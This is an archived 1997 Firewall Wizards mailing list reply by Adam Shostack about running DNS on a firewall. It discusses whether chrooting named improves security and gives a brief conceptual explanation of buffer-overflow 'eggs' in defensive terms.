Firewall Wizards mailing list archives
Re: DNS on the Firewall - security problem
From: Adam Shostack <adam () homeport org>
Date: Fri, 10 Oct 1997 07:51:09 -0400 (EDT)
Marc Heuse wrote:
| I found so far two possiblities to solve this problem ...
| The first is to chroot named. pointer : www.homeport.org/~adam/dns.html
| The second is to just forward the dns resolving to a host in the dmz plus
| running also the primary external dns there.
|
| Do you see any problems with these suggestions?
| And another question, are there any secure/minimal dns-servers out there?
| pointers?
Since I wrote the chrooting a named doc, I'll remind everyone that a
root process chrooted is not all that great an imrpovement in the
theoretical analysis. Its a nice improvement in practicality, since
there is no egg* to overflow and break a chroot. Thus, if you don't
put CHROOT/bin/sh in place, the standard attacks will fail, but a
smart attacker can still get in. In practicality, there are few smart
attackers.
Adam
*An egg is the core of code that a biuffer overflow includes to do the
real work. Its the thing that hatches and gets you root. See some
early l0pht advisory. And make that "no egg generally available."
--
"It is seldom that liberty of any kind is lost all at once."
-Hume
Current thread:
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 10)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Darren Reed (Oct 12)
- Re: DNS on the Firewall - security problem Perry E. Metzger (Oct 12)
- Re: DNS on the Firewall - security problem Aleph One (Oct 12)
- Re: DNS on the Firewall - security problem Gaddy Gumbao (Oct 13)
- Message not available
- Re: DNS on the Firewall - security problem Bernd Eckenfels (Oct 19)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)